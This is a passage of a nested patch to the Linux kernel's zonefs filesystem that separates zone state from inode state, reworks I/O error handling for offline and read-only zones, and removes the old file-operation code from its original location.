++		if (zonefs_zone_is_cnv(z))
++			return z->z_capacity;
+ 		return (zone->wp - zone->start) << SECTOR_SHIFT;
+ 	}
+ }
+ 
++/*
++ * Check a zone condition and adjust its inode access permissions for
++ * offline and readonly zones.
++ */
++static void zonefs_inode_update_mode(struct inode *inode)
++{
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++
++	if (z->z_flags & ZONEFS_ZONE_OFFLINE) {
++		/* Offline zones cannot be read nor written */
++		inode->i_flags |= S_IMMUTABLE;
++		inode->i_mode &= ~0777;
++	} else if (z->z_flags & ZONEFS_ZONE_READONLY) {
++		/* Readonly zones cannot be written */
++		inode->i_flags |= S_IMMUTABLE;
++		if (z->z_flags & ZONEFS_ZONE_INIT_MODE)
++			inode->i_mode &= ~0777;
++		else
++			inode->i_mode &= ~0222;
++	}
++
++	z->z_flags &= ~ZONEFS_ZONE_INIT_MODE;
++}
++
+ struct zonefs_ioerr_data {
+ 	struct inode	*inode;
+ 	bool		write;
+@@ -377,7 +255,7 @@ static int zonefs_io_error_cb(struct blk_zone *zone, unsigned int idx,
+ {
+ 	struct zonefs_ioerr_data *err = data;
+ 	struct inode *inode = err->inode;
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
+ 	struct super_block *sb = inode->i_sb;
+ 	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
+ 	loff_t isize, data_size;
+@@ -388,10 +266,9 @@ static int zonefs_io_error_cb(struct blk_zone *zone, unsigned int idx,
+ 	 * as there is no inconsistency between the inode size and the amount of
+	 * data written in the zone (data_size).
+ 	 */
+-	data_size = zonefs_check_zone_condition(inode, zone, true, false);
++	data_size = zonefs_check_zone_condition(sb, z, zone);
+ 	isize = i_size_read(inode);
+-	if (zone->cond != BLK_ZONE_COND_OFFLINE &&
+-	    zone->cond != BLK_ZONE_COND_READONLY &&
++	if (!(z->z_flags & (ZONEFS_ZONE_READONLY | ZONEFS_ZONE_OFFLINE)) &&
+ 	    !err->write && isize == data_size)
+ 		return 0;
+ 
+@@ -414,8 +291,9 @@ static int zonefs_io_error_cb(struct blk_zone *zone, unsigned int idx,
+ 	 * In all cases, warn about inode size inconsistency and handle the
+ 	 * IO error according to the zone condition and to the mount options.
+ 	 */
+-	if (zi->i_ztype == ZONEFS_ZTYPE_SEQ && isize != data_size)
+-		zonefs_warn(sb, "inode %lu: invalid size %lld (should be %lld)\n",
++	if (zonefs_zone_is_seq(z) && isize != data_size)
++		zonefs_warn(sb,
++			    "inode %lu: invalid size %lld (should be %lld)\n",
+ 			    inode->i_ino, isize, data_size);
+ 
+ 	/*
+@@ -424,24 +302,22 @@ static int zonefs_io_error_cb(struct blk_zone *zone, unsigned int idx,
+ 	 * zone condition to read-only and offline respectively, as if the
+ 	 * condition was signaled by the hardware.
+ 	 */
+-	if (zone->cond == BLK_ZONE_COND_OFFLINE ||
+-	    sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_ZOL) {
++	if ((z->z_flags & ZONEFS_ZONE_OFFLINE) ||
++	    (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_ZOL)) {
+ 		zonefs_warn(sb, "inode %lu: read/write access disabled\n",
+ 			    inode->i_ino);
+-		if (zone->cond != BLK_ZONE_COND_OFFLINE) {
+-			zone->cond = BLK_ZONE_COND_OFFLINE;
+-			data_size = zonefs_check_zone_condition(inode, zone,
+-								false, false);
+-		}
+-	} else if (zone->cond == BLK_ZONE_COND_READONLY ||
+-		   sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_ZRO) {
++		if (!(z->z_flags & ZONEFS_ZONE_OFFLINE))
++			z->z_flags |= ZONEFS_ZONE_OFFLINE;
++		zonefs_inode_update_mode(inode);
++		data_size = 0;
++	} else if ((z->z_flags & ZONEFS_ZONE_READONLY) ||
++		   (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_ZRO)) {
+ 		zonefs_warn(sb, "inode %lu: write access disabled\n",
+ 			    inode->i_ino);
+-		if (zone->cond != BLK_ZONE_COND_READONLY) {
+-			zone->cond = BLK_ZONE_COND_READONLY;
+-			data_size = zonefs_check_zone_condition(inode, zone,
+-								false, false);
+-		}
++		if (!(z->z_flags & ZONEFS_ZONE_READONLY))
++			z->z_flags |= ZONEFS_ZONE_READONLY;
++		zonefs_inode_update_mode(inode);
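++		/* Read-only zones keep their data: preserve the current size. */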
++		data_size = isize;
+ 	} else if (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_RO &&
+ 		   data_size > isize) {
+ 		/* Do not expose garbage data */
+@@ -455,9 +331,8 @@ static int zonefs_io_error_cb(struct blk_zone *zone, unsigned int idx,
+ 	 * close of the zone when the inode file is closed.
+ 	 */
+ 	if ((sbi->s_mount_opts & ZONEFS_MNTOPT_EXPLICIT_OPEN) &&
+-	    (zone->cond == BLK_ZONE_COND_OFFLINE ||
+-	     zone->cond == BLK_ZONE_COND_READONLY))
+-		zi->i_flags &= ~ZONEFS_ZONE_OPEN;
++	    (z->z_flags & (ZONEFS_ZONE_READONLY | ZONEFS_ZONE_OFFLINE)))
++		z->z_flags &= ~ZONEFS_ZONE_OPEN;
+ 
+ 	/*
+ 	 * If error=remount-ro was specified, any error results in remounting
+@@ -474,8 +349,8 @@ static int zonefs_io_error_cb(struct blk_zone *zone, unsigned int idx,
+ 	 */
+ 	zonefs_update_stats(inode, data_size);
+ 	zonefs_i_size_write(inode, data_size);
+-	zi->i_wpoffset = data_size;
+-	zonefs_account_active(inode);
++	z->z_wpoffset = data_size;
++	zonefs_inode_account_active(inode);
+ 
+ 	return 0;
+ }
+@@ -487,9 +362,9 @@ static int zonefs_io_error_cb(struct blk_zone *zone, unsigned int idx,
+  * eventually correct the file size and zonefs inode write pointer offset
+  * (which can be out of sync with the drive due to partial write failures).
+  */
+-static void __zonefs_io_error(struct inode *inode, bool write)
++void __zonefs_io_error(struct inode *inode, bool write)
+ {
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
+ 	struct super_block *sb = inode->i_sb;
+ 	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
+ 	unsigned int noio_flag;
+@@ -505,8 +380,8 @@ static void __zonefs_io_error(struct inode *inode, bool write)
+ 	 * files with aggregated conventional zones, for which the inode zone
+ 	 * size is always larger than the device zone size.
+ 	 */
+-	if (zi->i_zone_size > bdev_zone_sectors(sb->s_bdev))
+-		nr_zones = zi->i_zone_size >>
++	if (z->z_size > bdev_zone_sectors(sb->s_bdev))
++		nr_zones = z->z_size >>
+ 			(sbi->s_zone_sectors_shift + SECTOR_SHIFT);
+ 
+ 	/*
+@@ -518,7 +393,7 @@ static void __zonefs_io_error(struct inode *inode, bool write)
+ 	 * the GFP_NOIO context avoids both problems.
+ 	 */
+ 	noio_flag = memalloc_noio_save();
+-	ret = blkdev_report_zones(sb->s_bdev, zi->i_zsector, nr_zones,
++	ret = blkdev_report_zones(sb->s_bdev, z->z_sector, nr_zones,
+ 				  zonefs_io_error_cb, &err);
+ 	if (ret != nr_zones)
+ 		zonefs_err(sb, "Get inode %lu zone information failed %d\n",
+@@ -526,749 +401,6 @@ static void __zonefs_io_error(struct inode *inode, bool write)
+ 	memalloc_noio_restore(noio_flag);
+ }
+ 
+-static void zonefs_io_error(struct inode *inode, bool write)
+-{
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-
+-	mutex_lock(&zi->i_truncate_mutex);
+-	__zonefs_io_error(inode, write);
+-	mutex_unlock(&zi->i_truncate_mutex);
+-}
+-
+-static int zonefs_file_truncate(struct inode *inode, loff_t isize)
+-{
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	loff_t old_isize;
+-	enum req_op op;
+-	int ret = 0;
+-
+-	/*
+-	 * Only sequential zone files can be truncated and truncation is allowed
+-	 * only down to a 0 size, which is equivalent to a zone reset, and to
+-	 * the maximum file size, which is equivalent to a zone finish.
+-	 */
+-	if (zi->i_ztype != ZONEFS_ZTYPE_SEQ)
+-		return -EPERM;
+-
+-	if (!isize)
+-		op = REQ_OP_ZONE_RESET;
+-	else if (isize == zi->i_max_size)
+-		op = REQ_OP_ZONE_FINISH;
+-	else
+-		return -EPERM;
+-
+-	inode_dio_wait(inode);
+-
+-	/* Serialize against page faults */
+-	filemap_invalidate_lock(inode->i_mapping);
+-
+-	/* Serialize against zonefs_iomap_begin() */
+-	mutex_lock(&zi->i_truncate_mutex);
+-
+-	old_isize = i_size_read(inode);
+-	if (isize == old_isize)
+-		goto unlock;
+-
+-	ret = zonefs_zone_mgmt(inode, op);
+-	if (ret)
+-		goto unlock;
+-
+-	/*
+-	 * If the mount option ZONEFS_MNTOPT_EXPLICIT_OPEN is set,
+-	 * take care of open zones.
+-	 */
+-	if (zi->i_flags & ZONEFS_ZONE_OPEN) {
+-		/*
+-		 * Truncating a zone to EMPTY or FULL is the equivalent of
+-		 * closing the zone. For a truncation to 0, we need to
+-		 * re-open the zone to ensure new writes can be processed.
+-		 * For a truncation to the maximum file size, the zone is
+-		 * closed and writes cannot be accepted anymore, so clear
+-		 * the open flag.
+-		 */
+-		if (!isize)
+-			ret = zonefs_zone_mgmt(inode, REQ_OP_ZONE_OPEN);
+-		else
+-			zi->i_flags &= ~ZONEFS_ZONE_OPEN;
+-	}
+-
+-	zonefs_update_stats(inode, isize);
+-	truncate_setsize(inode, isize);
+-	zi->i_wpoffset = isize;
+-	zonefs_account_active(inode);
+-
+-unlock:
+-	mutex_unlock(&zi->i_truncate_mutex);
+-	filemap_invalidate_unlock(inode->i_mapping);
+-
+-	return ret;
+-}
+-
+-static int zonefs_inode_setattr(struct user_namespace *mnt_userns,
+-				struct dentry *dentry, struct iattr *iattr)
+-{
+-	struct inode *inode = d_inode(dentry);
+-	int ret;
+-
+-	if (unlikely(IS_IMMUTABLE(inode)))
+-		return -EPERM;
+-
+-	ret = setattr_prepare(&init_user_ns, dentry, iattr);
+-	if (ret)
+-		return ret;
+-
+-	/*
+-	 * Since files and directories cannot be created nor deleted, do not
+-	 * allow setting any write attributes on the sub-directories grouping
+-	 * files by zone type.
+-	 */
+-	if ((iattr->ia_valid & ATTR_MODE) && S_ISDIR(inode->i_mode) &&
+-	    (iattr->ia_mode & 0222))
+-		return -EPERM;
+-
+-	if (((iattr->ia_valid & ATTR_UID) &&
+-	     !uid_eq(iattr->ia_uid, inode->i_uid)) ||
+-	    ((iattr->ia_valid & ATTR_GID) &&
+-	     !gid_eq(iattr->ia_gid, inode->i_gid))) {
+-		ret = dquot_transfer(mnt_userns, inode, iattr);
+-		if (ret)
+-			return ret;
+-	}
+-
+-	if (iattr->ia_valid & ATTR_SIZE) {
+-		ret = zonefs_file_truncate(inode, iattr->ia_size);
+-		if (ret)
+-			return ret;
+-	}
+-
+-	setattr_copy(&init_user_ns, inode, iattr);
+-
+-	return 0;
+-}
+-
+-static const struct inode_operations zonefs_file_inode_operations = {
+-	.setattr	= zonefs_inode_setattr,
+-};
+-
+-static int zonefs_file_fsync(struct file *file, loff_t start, loff_t end,
+-			     int datasync)
+-{
+-	struct inode *inode = file_inode(file);
+-	int ret = 0;
+-
+-	if (unlikely(IS_IMMUTABLE(inode)))
+-		return -EPERM;
+-
+-	/*
+-	 * Since only direct writes are allowed in sequential files, page cache
+-	 * flush is needed only for conventional zone files.
+-	 */
+-	if (ZONEFS_I(inode)->i_ztype == ZONEFS_ZTYPE_CNV)
+-		ret = file_write_and_wait_range(file, start, end);
+-	if (!ret)
+-		ret = blkdev_issue_flush(inode->i_sb->s_bdev);
+-
+-	if (ret)
+-		zonefs_io_error(inode, true);
+-
+-	return ret;
+-}
+-
+-static vm_fault_t zonefs_filemap_page_mkwrite(struct vm_fault *vmf)
+-{
+-	struct inode *inode = file_inode(vmf->vma->vm_file);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	vm_fault_t ret;
+-
+-	if (unlikely(IS_IMMUTABLE(inode)))
+-		return VM_FAULT_SIGBUS;
+-
+-	/*
+-	 * Sanity check: only conventional zone files can have shared
+-	 * writeable mappings.
+-	 */
+-	if (WARN_ON_ONCE(zi->i_ztype != ZONEFS_ZTYPE_CNV))
+-		return VM_FAULT_NOPAGE;
+-
+-	sb_start_pagefault(inode->i_sb);
+-	file_update_time(vmf->vma->vm_file);
+-
+-	/* Serialize against truncates */
+-	filemap_invalidate_lock_shared(inode->i_mapping);
+-	ret = iomap_page_mkwrite(vmf, &zonefs_write_iomap_ops);
+-	filemap_invalidate_unlock_shared(inode->i_mapping);
+-
+-	sb_end_pagefault(inode->i_sb);
+-	return ret;
+-}
+-
+-static const struct vm_operations_struct zonefs_file_vm_ops = {
+-	.fault		= filemap_fault,
+-	.map_pages	= filemap_map_pages,
+-	.page_mkwrite	= zonefs_filemap_page_mkwrite,
+-};
+-
+-static int zonefs_file_mmap(struct file *file, struct vm_area_struct *vma)
+-{
+-	/*
+-	 * Conventional zones accept random writes, so their files can support
+-	 * shared writable mappings. For sequential zone files, only read
+-	 * mappings are possible since there are no guarantees for write
+-	 * ordering between msync() and page cache writeback.
+-	 */
+-	if (ZONEFS_I(file_inode(file))->i_ztype == ZONEFS_ZTYPE_SEQ &&
+-	    (vma->vm_flags & VM_SHARED) && (vma->vm_flags & VM_MAYWRITE))
+-		return -EINVAL;
+-
+-	file_accessed(file);
+-	vma->vm_ops = &zonefs_file_vm_ops;
+-
+-	return 0;
+-}
+-
+-static loff_t zonefs_file_llseek(struct file *file, loff_t offset, int whence)
+-{
+-	loff_t isize = i_size_read(file_inode(file));
+-
+-	/*
+-	 * Seeks are limited to below the zone size for conventional zones
+-	 * and below the zone write pointer for sequential zones. In both
+-	 * cases, this limit is the inode size.
+-	 */
+-	return generic_file_llseek_size(file, offset, whence, isize, isize);
+-}
+-
+-static int zonefs_file_write_dio_end_io(struct kiocb *iocb, ssize_t size,
+-					int error, unsigned int flags)
+-{
+-	struct inode *inode = file_inode(iocb->ki_filp);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-
+-	if (error) {
+-		zonefs_io_error(inode, true);
+-		return error;
+-	}
+-
+-	if (size && zi->i_ztype != ZONEFS_ZTYPE_CNV) {
+-		/*
+-		 * Note that we may be seeing completions out of order,
+-		 * but that is not a problem since a write completed
+-		 * successfully necessarily means that all preceding writes
+-		 * were also successful. So we can safely increase the inode
+-		 * size to the write end location.
+-		 */
+-		mutex_lock(&zi->i_truncate_mutex);
+-		if (i_size_read(inode) < iocb->ki_pos + size) {
+-			zonefs_update_stats(inode, iocb->ki_pos + size);
+-			zonefs_i_size_write(inode, iocb->ki_pos + size);
+-		}
+-		mutex_unlock(&zi->i_truncate_mutex);
+-	}
+-
+-	return 0;
+-}
+-
+-static const struct iomap_dio_ops zonefs_write_dio_ops = {
+-	.end_io			= zonefs_file_write_dio_end_io,
+-};
+-
+-static ssize_t zonefs_file_dio_append(struct kiocb *iocb, struct iov_iter *from)
+-{
+-	struct inode *inode = file_inode(iocb->ki_filp);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	struct block_device *bdev = inode->i_sb->s_bdev;
+-	unsigned int max = bdev_max_zone_append_sectors(bdev);
+-	struct bio *bio;
+-	ssize_t size;
+-	int nr_pages;
+-	ssize_t ret;
+-
+-	max = ALIGN_DOWN(max << SECTOR_SHIFT, inode->i_sb->s_blocksize);
+-	iov_iter_truncate(from, max);
+-
+-	nr_pages = iov_iter_npages(from, BIO_MAX_VECS);
+-	if (!nr_pages)
+-		return 0;
+-
+-	bio = bio_alloc(bdev, nr_pages,
+-			REQ_OP_ZONE_APPEND | REQ_SYNC | REQ_IDLE, GFP_NOFS);
+-	bio->bi_iter.bi_sector = zi->i_zsector;
+-	bio->bi_ioprio = iocb->ki_ioprio;
+-	if (iocb_is_dsync(iocb))
+-		bio->bi_opf |= REQ_FUA;
+-
+-	ret = bio_iov_iter_get_pages(bio, from);
+-	if (unlikely(ret))
+-		goto out_release;
+-
+-	size = bio->bi_iter.bi_size;
+-	task_io_account_write(size);
+-
+-	if (iocb->ki_flags & IOCB_HIPRI)
+-		bio_set_polled(bio, iocb);
+-
+-	ret = submit_bio_wait(bio);
+-
+-	/*
+-	 * If the file zone was written underneath the file system, the zone
+-	 * write pointer may not be where we expect it to be, but the zone
+-	 * append write can still succeed. So check manually that we wrote where
+-	 * we intended to, that is, at zi->i_wpoffset.
+-	 */
+-	if (!ret) {
+-		sector_t wpsector =
+-			zi->i_zsector + (zi->i_wpoffset >> SECTOR_SHIFT);
+-
+-		if (bio->bi_iter.bi_sector != wpsector) {
+-			zonefs_warn(inode->i_sb,
+-				"Corrupted write pointer %llu for zone at %llu\n",
+-				wpsector, zi->i_zsector);
+-			ret = -EIO;
+-		}
+-	}
+-
+-	zonefs_file_write_dio_end_io(iocb, size, ret, 0);
+-	trace_zonefs_file_dio_append(inode, size, ret);
+-
+-out_release:
+-	bio_release_pages(bio, false);
+-	bio_put(bio);
+-
+-	if (ret >= 0) {
+-		iocb->ki_pos += size;
+-		return size;
+-	}
+-
+-	return ret;
+-}
+-
+-/*
+- * Do not exceed the LFS limits nor the file zone size. If pos is under the
+- * limit it becomes a short access. If it exceeds the limit, return -EFBIG.
+- */
+-static loff_t zonefs_write_check_limits(struct file *file, loff_t pos,
+-					loff_t count)
+-{
+-	struct inode *inode = file_inode(file);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	loff_t limit = rlimit(RLIMIT_FSIZE);
+-	loff_t max_size = zi->i_max_size;
+-
+-	if (limit != RLIM_INFINITY) {
+-		if (pos >= limit) {
+-			send_sig(SIGXFSZ, current, 0);
+-			return -EFBIG;
+-		}
+-		count = min(count, limit - pos);
+-	}
+-
+-	if (!(file->f_flags & O_LARGEFILE))
+-		max_size = min_t(loff_t, MAX_NON_LFS, max_size);
+-
+-	if (unlikely(pos >= max_size))
+-		return -EFBIG;
+-
+-	return min(count, max_size - pos);
+-}
+-
+-static ssize_t zonefs_write_checks(struct kiocb *iocb, struct iov_iter *from)
+-{
+-	struct file *file = iocb->ki_filp;
+-	struct inode *inode = file_inode(file);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	loff_t count;
+-
+-	if (IS_SWAPFILE(inode))
+-		return -ETXTBSY;
+-
+-	if (!iov_iter_count(from))
+-		return 0;
+-
+-	if ((iocb->ki_flags & IOCB_NOWAIT) && !(iocb->ki_flags & IOCB_DIRECT))
+-		return -EINVAL;
+-
+-	if (iocb->ki_flags & IOCB_APPEND) {
+-		if (zi->i_ztype != ZONEFS_ZTYPE_SEQ)
+-			return -EINVAL;
+-		mutex_lock(&zi->i_truncate_mutex);
+-		iocb->ki_pos = zi->i_wpoffset;
+-		mutex_unlock(&zi->i_truncate_mutex);
+-	}
+-
+-	count = zonefs_write_check_limits(file, iocb->ki_pos,
+-					  iov_iter_count(from));
+-	if (count < 0)
+-		return count;
+-
+-	iov_iter_truncate(from, count);
+-	return iov_iter_count(from);
+-}
+-
+-/*
+- * Handle direct writes. For sequential zone files, this is the only possible
+- * write path. For these files, check that the user is issuing writes
+- * sequentially from the end of the file. This code assumes that the block layer
+- * delivers write requests to the device in sequential order. This is always the
+- * case if a block IO scheduler implementing the ELEVATOR_F_ZBD_SEQ_WRITE
+- * elevator feature is being used (e.g. mq-deadline). The block layer always
+- * automatically select such an elevator for zoned block devices during the
+- * device initialization.
+- */
+-static ssize_t zonefs_file_dio_write(struct kiocb *iocb, struct iov_iter *from)
+-{
+-	struct inode *inode = file_inode(iocb->ki_filp);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	struct super_block *sb = inode->i_sb;
+-	bool sync = is_sync_kiocb(iocb);
+-	bool append = false;
+-	ssize_t ret, count;
+-
+-	/*
+-	 * For async direct IOs to sequential zone files, refuse IOCB_NOWAIT
+-	 * as this can cause write reordering (e.g. the first aio gets EAGAIN
+-	 * on the inode lock but the second goes through but is now unaligned).
+-	 */
+-	if (zi->i_ztype == ZONEFS_ZTYPE_SEQ && !sync &&
+-	    (iocb->ki_flags & IOCB_NOWAIT))
+-		return -EOPNOTSUPP;
+-
+-	if (iocb->ki_flags & IOCB_NOWAIT) {
+-		if (!inode_trylock(inode))
+-			return -EAGAIN;
+-	} else {
+-		inode_lock(inode);
+-	}
+-
+-	count = zonefs_write_checks(iocb, from);
+-	if (count <= 0) {
+-		ret = count;
+-		goto inode_unlock;
+-	}
+-
+-	if ((iocb->ki_pos | count) & (sb->s_blocksize - 1)) {
+-		ret = -EINVAL;
+-		goto inode_unlock;
+-	}
+-
+-	/* Enforce sequential writes (append only) in sequential zones */
+-	if (zi->i_ztype == ZONEFS_ZTYPE_SEQ) {
+-		mutex_lock(&zi->i_truncate_mutex);
+-		if (iocb->ki_pos != zi->i_wpoffset) {
+-			mutex_unlock(&zi->i_truncate_mutex);
+-			ret = -EINVAL;
+-			goto inode_unlock;
+-		}
+-		mutex_unlock(&zi->i_truncate_mutex);
+-		append = sync;
+-	}
+-
+-	if (append)
+-		ret = zonefs_file_dio_append(iocb, from);
+-	else
+-		ret = iomap_dio_rw(iocb, from, &zonefs_write_iomap_ops,
+-				   &zonefs_write_dio_ops, 0, NULL, 0);
+-	if (zi->i_ztype == ZONEFS_ZTYPE_SEQ &&
+-	    (ret > 0 || ret == -EIOCBQUEUED)) {
+-		if (ret > 0)
+-			count = ret;
+-
+-		/*
+-		 * Update the zone write pointer offset assuming the write
+-		 * operation succeeded. If it did not, the error recovery path
+-		 * will correct it. Also do active seq file accounting.
+-		 */
+-		mutex_lock(&zi->i_truncate_mutex);
+-		zi->i_wpoffset += count;
+-		zonefs_account_active(inode);
+-		mutex_unlock(&zi->i_truncate_mutex);
+-	}
+-
+-inode_unlock:
+-	inode_unlock(inode);
+-
+-	return ret;
+-}
+-
+-static ssize_t zonefs_file_buffered_write(struct kiocb *iocb,
+-					  struct iov_iter *from)
+-{
+-	struct inode *inode = file_inode(iocb->ki_filp);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	ssize_t ret;
+-
+-	/*
+-	 * Direct IO writes are mandatory for sequential zone files so that the
+-	 * write IO issuing order is preserved.
+-	 */
+-	if (zi->i_ztype != ZONEFS_ZTYPE_CNV)
+-		return -EIO;
+-
+-	if (iocb->ki_flags & IOCB_NOWAIT) {
+-		if (!inode_trylock(inode))
+-			return -EAGAIN;
+-	} else {
+-		inode_lock(inode);
+-	}
+-
+-	ret = zonefs_write_checks(iocb, from);
+-	if (ret <= 0)
+-		goto inode_unlock;
+-
+-	ret = iomap_file_buffered_write(iocb, from, &zonefs_write_iomap_ops);
+-	if (ret > 0)
+-		iocb->ki_pos += ret;
+-	else if (ret == -EIO)
+-		zonefs_io_error(inode, true);
+-
+-inode_unlock:
+-	inode_unlock(inode);
+-	if (ret > 0)
+-		ret = generic_write_sync(iocb, ret);
+-
+-	return ret;
+-}
+-
+-static ssize_t zonefs_file_write_iter(struct kiocb *iocb, struct iov_iter *from)
+-{
+-	struct inode *inode = file_inode(iocb->ki_filp);
+-
+-	if (unlikely(IS_IMMUTABLE(inode)))
+-		return -EPERM;
+-
+-	if (sb_rdonly(inode->i_sb))
+-		return -EROFS;
+-
+-	/* Write operations beyond the zone size are not allowed */
+-	if (iocb->ki_pos >= ZONEFS_I(inode)->i_max_size)
+-		return -EFBIG;
+-
+-	if (iocb->ki_flags & IOCB_DIRECT) {
+-		ssize_t ret = zonefs_file_dio_write(iocb, from);
+-		if (ret != -ENOTBLK)
+-			return ret;
+-	}
+-
+-	return zonefs_file_buffered_write(iocb, from);
+-}
+-
+-static int zonefs_file_read_dio_end_io(struct kiocb *iocb, ssize_t size,
+-				       int error, unsigned int flags)
+-{
+-	if (error) {
+-		zonefs_io_error(file_inode(iocb->ki_filp), false);
+-		return error;
+-	}
+-
+-	return 0;
+-}
+-
+-static const struct iomap_dio_ops zonefs_read_dio_ops = {
+-	.end_io			= zonefs_file_read_dio_end_io,
+-};
+-
+-static ssize_t zonefs_file_read_iter(struct kiocb *iocb, struct iov_iter *to)
+-{
+-	struct inode *inode = file_inode(iocb->ki_filp);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	struct super_block *sb = inode->i_sb;
+-	loff_t isize;
+-	ssize_t ret;
+-
+-	/* Offline zones cannot be read */
+-	if (unlikely(IS_IMMUTABLE(inode) && !(inode->i_mode & 0777)))
+-		return -EPERM;
+-
+-	if (iocb->ki_pos >= zi->i_max_size)
+-		return 0;
+-
+-	if (iocb->ki_flags & IOCB_NOWAIT) {
+-		if (!inode_trylock_shared(inode))
+-			return -EAGAIN;
+-	} else {
+-		inode_lock_shared(inode);
+-	}
+-
+-	/* Limit read operations to written data */
+-	mutex_lock(&zi->i_truncate_mutex);
+-	isize = i_size_read(inode);
+-	if (iocb->ki_pos >= isize) {
+-		mutex_unlock(&zi->i_truncate_mutex);
+-		ret = 0;
+-		goto inode_unlock;
+-	}
+-	iov_iter_truncate(to, isize - iocb->ki_pos);
+-	mutex_unlock(&zi->i_truncate_mutex);
+-
+-	if (iocb->ki_flags & IOCB_DIRECT) {
+-		size_t count = iov_iter_count(to);
+-
+-		if ((iocb->ki_pos | count) & (sb->s_blocksize - 1)) {
+-			ret = -EINVAL;
+-			goto inode_unlock;
+-		}
+-		file_accessed(iocb->ki_filp);
+-		ret = iomap_dio_rw(iocb, to, &zonefs_read_iomap_ops,
+-				   &zonefs_read_dio_ops, 0, NULL, 0);
+-	} else {
+-		ret = generic_file_read_iter(iocb, to);
+-		if (ret == -EIO)
+-			zonefs_io_error(inode, false);
+-	}
+-
+-inode_unlock:
+-	inode_unlock_shared(inode);
+-
+-	return ret;
+-}
+-
+-/*
+- * Write open accounting is done only for sequential files.
+- */
+-static inline bool zonefs_seq_file_need_wro(struct inode *inode,
+-					    struct file *file)
+-{
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-
+-	if (zi->i_ztype != ZONEFS_ZTYPE_SEQ)
+-		return false;
+-
+-	if (!(file->f_mode & FMODE_WRITE))
+-		return false;
+-
+-	return true;
+-}
+-
+-static int zonefs_seq_file_write_open(struct inode *inode)
+-{
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	int ret = 0;
+-
+-	mutex_lock(&zi->i_truncate_mutex);
+-
+-	if (!zi->i_wr_refcnt) {
+-		struct zonefs_sb_info *sbi = ZONEFS_SB(inode->i_sb);
+-		unsigned int wro = atomic_inc_return(&sbi->s_wro_seq_files);
+-
+-		if (sbi->s_mount_opts & ZONEFS_MNTOPT_EXPLICIT_OPEN) {
+-
+-			if (sbi->s_max_wro_seq_files
+-			    && wro > sbi->s_max_wro_seq_files) {
+-				atomic_dec(&sbi->s_wro_seq_files);
+-				ret = -EBUSY;
+-				goto unlock;
+-			}
+-
+-			if (i_size_read(inode) < zi->i_max_size) {
+-				ret = zonefs_zone_mgmt(inode, REQ_OP_ZONE_OPEN);
+-				if (ret) {
+-					atomic_dec(&sbi->s_wro_seq_files);
+-					goto unlock;
+-				}
+-				zi->i_flags |= ZONEFS_ZONE_OPEN;
+-				zonefs_account_active(inode);
+-			}
+-		}
+-	}
+-
+-	zi->i_wr_refcnt++;
+-
+-unlock:
+-	mutex_unlock(&zi->i_truncate_mutex);
+-
+-	return ret;
+-}
+-
+-static int zonefs_file_open(struct inode *inode, struct file *file)
+-{
+-	int ret;
+-
+-	ret = generic_file_open(inode, file);
+-	if (ret)
+-		return ret;
+-
+-	if (zonefs_seq_file_need_wro(inode, file))
+-		return zonefs_seq_file_write_open(inode);
+-
+-	return 0;
+-}
+-
+-static void zonefs_seq_file_write_close(struct inode *inode)
+-{
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	struct super_block *sb = inode->i_sb;
+-	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
+-	int ret = 0;
+-
+-	mutex_lock(&zi->i_truncate_mutex);
+-
+-	zi->i_wr_refcnt--;
+-	if (zi->i_wr_refcnt)
+-		goto unlock;
+-
+-	/*
+-	 * The file zone may not be open anymore (e.g. the file was truncated to
+-	 * its maximum size or it was fully written). For this case, we only
+-	 * need to decrement the write open count.
+-	 */
+-	if (zi->i_flags & ZONEFS_ZONE_OPEN) {
+-		ret = zonefs_zone_mgmt(inode, REQ_OP_ZONE_CLOSE);
+-		if (ret) {
+-			__zonefs_io_error(inode, false);
+-			/*
+-			 * Leaving zones explicitly open may lead to a state
+-			 * where most zones cannot be written (zone resources
+-			 * exhausted). So take preventive action by remounting
+-			 * read-only.
+-			 */
+-			if (zi->i_flags & ZONEFS_ZONE_OPEN &&
+-			    !(sb->s_flags & SB_RDONLY)) {
+-				zonefs_warn(sb,
+-					"closing zone at %llu failed %d\n",
+-					zi->i_zsector, ret);
+-				zonefs_warn(sb,
+-					"remounting filesystem read-only\n");
+-				sb->s_flags |= SB_RDONLY;
+-			}
+-			goto unlock;
+-		}
+-
+-		zi->i_flags &= ~ZONEFS_ZONE_OPEN;
+-		zonefs_account_active(inode);
+-	}
+-
+-	atomic_dec(&sbi->s_wro_seq_files);
+-
+-unlock:
+-	mutex_unlock(&zi->i_truncate_mutex);
+-}
+-
+-static int zonefs_file_release(struct inode *inode, struct file *file)
+-{
+-	/*
+-	 * If we explicitly open a zone we must close it again as well, but the
+-	 * zone management operation can fail (either due to an IO error or as
+-	 * the zone has gone offline or read-only). Make sure we don't fail the
+-	 * close(2) for user-space.
+-	 */
+-	if (zonefs_seq_file_need_wro(inode, file))
+-		zonefs_seq_file_write_close(inode);
+-
+-	return 0;
+-}
+-
+-static const struct file_operations zonefs_file_operations = {
+-	.open		= zonefs_file_open,
+-	.release	= zonefs_file_release,
+-	.fsync		= zonefs_file_fsync,
